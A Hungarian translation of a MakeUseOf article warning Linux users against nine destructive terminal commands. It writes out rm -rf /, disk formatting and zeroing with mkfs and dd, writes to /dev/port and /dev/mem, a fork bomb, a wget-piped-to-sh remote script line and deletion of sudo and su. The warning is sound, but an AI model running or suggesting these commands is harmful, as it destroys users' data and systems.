9 halálos Linux parancs, amit soha ne futtass!
(9 Lethal Linux Commands YouShould Never Run - fordítás)
Írta: Joel Lee
A cikk eredetije itt olvasható: http://www.makeuseof.com/tag/9-lethal-linux-commands-never-run/ A Linux kétélű fegyver lehet. Feltételezi, hogy tudod mit csinálsz és megadja a szabadságot, hogy bármit megtegyél. Kérdés nélkül. Ez kényelmes, ha tudod, hogy éppen mit csinálsz, de azt is jelenti, bármikor tönkre teheted a rendszeredet másodpercek alatt.
Új vagy a Linux parancssorban? Ne aggódj. Kezdd a ismerkedést nálunk, a Bevezető a Linux terminálba és 40 alapvető Linux parancs ismertetőkkel. Ezekkel gyorsan megismerkedhetsz a parancssorral.
De, függetlenül attól, hogy újonc, vagy veterán linuxos vagy, sose futtass parancsot, ha nem tudod, hogy pontosan mit tesz. Íme néhány a leghalálosabb Linux parancsok közül, amiket – többnyire – kerülni kell.
Rekurzív törlés
A Linux képessége, hogy bármi törölhető kérdés nélkül, egy áldás, különösen, ha éveken keresztül küzdöttél a Windows „A fájl nem törölhető” hibajelzésével. Ám internetes gazfickók könnyen felültethetnek, bedobva a veszélyes eltávolítás (rm) parancsot, ami a teljes merevlemezedet kisöpörheti.
rm -rf /
Ez az rm parancsot két kapcsolóval futtatja: a -r, ami rekurzív törlést ír elő az összes alkönyvtárat beleértve és a -f, ami kikényszeríti a törlést, még a csak olvasható fájlokét is, megerősítés nélkül. A parancsot a gyökérkönyvtárban hajtja végre, lényegében tisztára söpörve a teljes rendszeredet.
Megjegyzem, a legtöbb mai Linux rendszer figyelmeztet, ha ezt akarod megtenni. Azonban, a figyelmeztetés nem garantált, szóval inkább ne tedd.
Merevlemez formázása
A terminál a kezdő linuxosoknak különösen trükkös, mivel számos lehetőséget nyújt a merevlemez véletlen törlésére. A rekurzív törlés alapvető, de íme egy másik:
mkfs.ext3 /dev/hda
Ez a parancs a merevlemezt ext3 fájlrendszerre formázza. A lemezmeghajtó formázása nem feltétlenül rosszindulatú művelet, de alapállapotba teszi a meghajtót, mintha teljesen új lenne. Más szavakkal, egy formázott lemez olyan, mint egy üres vászon.
A formázás hasznos, partíciók és külső meghajtók esetén, de egy teljes merevlemezre végrehajtani (mint a /dev/hda) veszélyes és könnyen helyrehozhatatlan állapotba hozhatja a rendszert.
Merevlemez felülírása
Ha a véletlen lemezformázás nem lenne elég rossz, felülírható a merevlemez mindenféle adatokkal. A lemezformázás legalább egy, a való életben is tényleg használt folyamat; a meghajtó közvetlen felülírása viszont nem annyira nagyszerű dolog.
command > /dev/hda
A fenti parancsban a command helyett állhat bármilyen bash parancs. A > operátor átirányítja a tőle balra álló parancs kimenetét a tőle jobbra lévő fájlba. Ebben az esetben teljesen lényegtelen, hogy bal oldali parancsnak mi a kimenete. Az adatsor átkerül és arra szolgál, hogy felülírja a merevlemezen a rendszert.
Képzelheted, hogy milyen haszontalan dolgokat ad át.
Merevlemez kisöprése
Íme egy újabb módja a rendszered lerombolásának. Ezúttal a parancs teljesen lenullázza a merevlemezedet. Az adatok nem sérülnek, vagy felülíródnak, hanem a merevlemezedet szó szerint nullákkal tölti fel. Egy meghajtót semmi sem takarít ki jobban, mint ez.
dd if=/dev/zero of=/dev/hda
A dd egy alacsony szintű utasítás, ami leginkább adatok fizikai meghajtóra írásához használatos. Az if paraméter határozza meg az adat forrását, ami estünkben /dev/zero, ami a Linux különlegessége, nullák végtelen sorát adja. Az of paraméter határozza meg a nullák célját, ami a /dev/hda meghajtó.
Igen, lehetnek okai, amiért a lemez nullázása szükséges, de ha nem ismered ezeket az okokat, akkor jobb, ha távol tartod magad ettől a parancstól.
Merevlemez tönkretétele
Ha már unod a merevlemez lerombolásának különféle módjait, akkor várj még egy kicsit. Íme még egy. A Linuxban van egy különleges fájl, a /dev/null, ami számára lényegtelen, hogy mit írsz bele. Tekintheted egyfajta fekete lyuknak, vagy fájldarálónak: bármit is adsz neki, felfalja.
mv / /dev/null
Látod, hogy hol itt veszély? Az mv parancs megpróbálja a rendszer gyökérkönyvtárát / a /dev/null fekete lyukba mozgatni. Ez egy érvényes parancs és a hatása pusztító: a merevlemezt felemészti és semmi sem marad utána. Ezzel a rendszered használhatatlanná válik.
Kernel Panic okozása
A Windows hírhedt a Kék halál képernyője miatt. A legendák ellenére a Linux sem teljesen biztonságos rendszer. Néha, jelentkezik olyan belső hiba, amiből nem lehet kilábalni, vagyis a rendszer valami olyasmit produkál, mint a kék halál képernyő: a kernel panic-ot.
dd if=/dev/random of=/dev/port
echo 1 > /proc/sys/kernel/panic
cat /dev/port
cat /dev/zero > /dev/mem
A fenti parancsok okozta bonyodalmak nem annyira érdekesek. Ami viszont lényeges, hogy bármelyik sor futtatása kernel panic-ot okoz, a rendszer újraindítását kényszerítve. Jobb ezektől a parancsoktól tartózkodni, hacsak nem tudod teljes biztonsággal, hogy mit csinálsz.
Fork Bomb
# Láncos bomba – magyar kifejezést nem találtam rá, de talán ez közelíti meg legjobban a lényegét.
A Bash, a Linux-terminál nyelve és elég hatásos. Nemcsak parancsokat, hanem függvényeket is képes futtatni, ami könnyűvé teszi szkriptek írását, ezzel rendszerfeladatok automatizálhatók.
Sajnos a függvényekkel veszélyek is járnak.
:(){:|:&};:
Ezt a furcsa, Fork Bomb-nak hívott parancs, egy különleges kernel panic. Egy : nevű különleges függvényt ír le, ami magát hívja meg kétszer, amikor végrehajtódik. A rekurzív hívások egyike az előtérben fut, miközben a másik a háttérben történik meg.
Más szavakkal, a függvény bármikor futva két al-folyamatot szül. Ezek az al-folyamatok hozzák a saját al-folyamataikat és ez a ciklus végtelen hurokban folytatódik. Egyetlen lehetőség, hogy kikerülj belőle, a rendszer újraindítása.
Távoli szkriptek futtatása
Íme egy ártatlan parancs, ami egy Linux rendszeren a napi életben hasznos is lehet. A wget egy web-cím tartalmát szedi le, ami weboldalak elérésére, vagy fájlok letöltésére használható. Ugyanakkor egy egyszerű trükkel veszélyessé is tehető:
wget http://egy-megbízhatatalan-oldal-urlje -O- | sh
A fenti kombináció letölti az adott URL tartalmát és azonnal betölti az sh parancsba, ami a letöltött tartalmat végrehajtja a terminálban. Ha az URL egy rosszindulatú szkriptre mutat, akkor valószínűleg megpecsételed a sorsodat a paranccsal.
Rendszergazda-jogok kiiktatása
Ez az utolsó parancs elég egyértelmű. A gyakran használt rm parancsot alkalmazza, hogy kikapcsolja a Linux két legfontosabb parancsát: a sudo-t és a su-t. Röviden, ezek a parancsok teszik lehetővé, hogy más parancsokat rendszergazda jogokkal futtass. Nélkülük az élet a Linux-ban kín.
rm -f /usr/bin/sudo;rm -f /bin/su
Amiért ezt a parancsokat ne futtasd: kényszerítve törli mindkét parancsot a rendszeredből, megerősítést nem kérve, nagy zűrt hagyva maga után. Vannak módszerek, amivel a törölt dolgokat helyreállíthatod, de nem mindig egyértelműek és kellemesek.
Légy óvatos! Ne félj terminálban a Linux-parancsokkal kísérletezni, de ugyanakkor tájékozódj és sose hajts végre semmi olyat, aminek a hatásával nem vagy teljesen tisztában. Ha valaki azt mondja neked, hogy „próbáld ki ezt a parancsot”, mindig kétszeresen, vagy háromszorosan ellenőrizd le.
Futtattál bármikor is romboló parancsot? Mi történt? Megvezetett már valaki ilyennel? Oszd meg velünk gondolataidat és tapasztalataidat a kommentároknál!